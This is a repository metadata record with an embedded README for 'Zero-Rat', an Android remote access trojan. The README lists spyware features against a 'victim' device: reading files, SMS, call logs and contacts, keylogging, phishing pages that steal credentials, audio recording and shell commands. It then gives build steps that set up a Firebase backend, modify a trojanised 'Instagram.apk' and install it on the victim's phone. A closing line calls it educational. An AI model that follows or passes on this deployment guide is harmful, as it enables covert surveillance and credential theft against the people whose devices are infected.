{"id":25037407,"url":"https://github.com/caronero/zero-rat","last_synced_at":"2025-09-10T03:35:32.458Z","repository":{"id":37400722,"uuid":"505559096","full_name":"caronero/Zero-Rat","owner":"caronero","description":"Android RAT with GUI based Web Panel without port forwarding. you can use it from any device","archived":false,"fork":false,"pushed_at":"2024-09-22T20:10:10.000Z","size":17699,"stargazers_count":88,"open_issues_count":2,"forks_count":42,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-08T16:38:23.213Z","etag":null,"topics":["android","caro","caro-nero","caronero","carotool","gui-application","hacker","hacking-tool","java","rat","tool","tools","toolzero","zero","zero-rat","zerorat","zerotool"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/caronero.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-06-20T18:42:52.000Z","updated_at":"2025-04-06T16:04:38.000Z","dependencies_parsed_at":"2025-02-06T01:49:09.567Z","dependency_job_id":"ee497fdc-4b98-4b98-8542-856dfec293b4","html_url":"https://github.com/caronero/Zero-Rat","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/caronero/Zero-Rat","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caronero%2FZero-Rat","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caronero%2FZero-Rat/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caronero%2FZero-Rat/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caronero%2FZero-Rat/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/caronero","download_url":"https://codeload.github.com/caronero/Zero-Rat/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caronero%2FZero-Rat/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":274407337,"owners_count":25279269,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-10T02:00:12.551Z","response_time":83,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","caro","caro-nero","caronero","carotool","gui-application","hacker","hacking-tool","java","rat","tool","tools","toolzero","zero","zero-rat","zerorat","zerotool"],"created_at":"2025-02-06T01:49:02.326Z","updated_at":"2025-09-10T03:35:32.424Z","avatar_url":"https://github.com/caronero.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src='img/cn.png' style=\"height:100px;width:100px;\" \u003e\n\u003c/p\u003e\n\u003ch1 align=center\u003eZero-Rat\u003c/h1\u003e\n\n#### A multifunctional Android RAT with GUI based Web Panel without port forwarding.\nA tool that remasterd for AIRAVAT tool \n## Features\n - Read all the files of Internal Storage\n - Download Any Media to your Device from Victims Device\n - Get all the system information of Victim Device\n - Retrieve the List of Installed Applications\n - Retrive SMS\n - Retrive Call Logs\n - Retrive Contacts\n - Send SMS\n - Gets all the Notifications \n - Keylogger\n - Admin Permission \n - Show Phishing Pages to steal credentials through notification.\n    - Steal credentials through pre built phishing pages\n    - Open any suspicious website through notification to steal credentials.\n - Record Audio\n - Play music in Victim's device\n - Vibrate Device\n - Text To Speech \n - Change Wallpaper\n - Run shell Commands\n - Runs In Background \n    - Auto Starts on restarting the device\n    - Auto Starts when any notification arrives\n - No port forwarding needed\n\n\n\n## Requirements\n - Firebase Account\n - [ApkEasy Tool](https://apk-easy-tool.en.lo4d.com/windows) ( For PC ) or \n[ApkTool M](https://maximoff.su/apktool/?lang=en) ( for Android)\n\n\n## How to Build \n  ### Firebase Setup\n 1. Create an Firebase Account and afterwords create a new project with any name.\n 1. Enable Firebase Database and Firebase Storage.\n 1. In Firebase Database Click on the rules and set `.read` and `.write` to `true`\n    - ```js\n          {\n           \"rules\": {\n                   \".read\": \"true\",\n                   \".write\": \"true\"\n                    }\n          }\n      ```\n 1. In Firebase Storage allow reads and writes for all paths.\n    - ```js\n        rules_version = '2';\n        service firebase.storage {\n        match /b/{bucket}/o {\n            match /{allPaths=**} {\n               allow read, write \n              }\n          }\n       }\n      ```\n 1. Now Go to project overview and create an Android App and download the `google-services.json` file.\n 1. Also create a web app and copy the config of webapp.\n   ### Panel Setup\n 1. You can use Github Pages or any Hosting Website for hosting the panel.\n 1. Open [home.html](./home.html) File and from [line number 16](https://github.com/Th30neAnd0nly/AIRAVAT/blob/302dca641bb04c6bed72d1b2cebdfc79ccfbb046/WEB%20PANEL/index.html#L16) replace the config with your web app config which you have created on Step 6.\n 1. Save the file , Your Panel Setup is completed.\n ### Android RAT\n 1. Download [Instagram.apk](https://github.com/caronero/Zero-Rat/raw/master/APK/Instagram.apk)\n 1. Decompile it using any Decompiler recommend above.\n 1. Now open `res/values/strings.xml` file.\n 1. Replace values of `firebase_database_url ` , `google_api_key` , `google_app_id` , `google_storage_bucket` , `project_id` with your Firebase Account using `google-services.json` file which you have downloaded on step 5\n    - Example \n       ```xml \n       \u003cstring name=\"firebase_database_url\"\u003ehttps://your_database_url.firebase.com\u003c/string\u003e\n       \u003cstring name=\"google_api_key\"\u003eyour_api_key\u003c/string\u003e\n       \u003cstring name=\"google_app_id\"\u003eyour_app_id\u003c/string\u003e\n       \u003cstring name=\"google_storage_bucket\"\u003eyour_storage_bucket_url\u003c/string\u003e\n       \u003cstring name=\"project_id\"\u003eproject_id\u003c/string\u003e\n       ```\n 1. Now compile the code with appt2.\n 1. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.\n\n\n## Contact Info \n 1. [Telegram](https://t.me/cn_zd)\n 2. [Watch full video installation here](https://t.me/cn_zd46/13)\n\n\n## DISCLAIMER\n\u003cp align=\"center\"\u003e\n TO BE USED FOR EDUCATIONAL PURPOSES ONLY\n\u003c/p\u003e\n\n\nThe use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read [LICENSE](LICENSE).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaronero%2Fzero-rat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcaronero%2Fzero-rat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaronero%2Fzero-rat/lists"}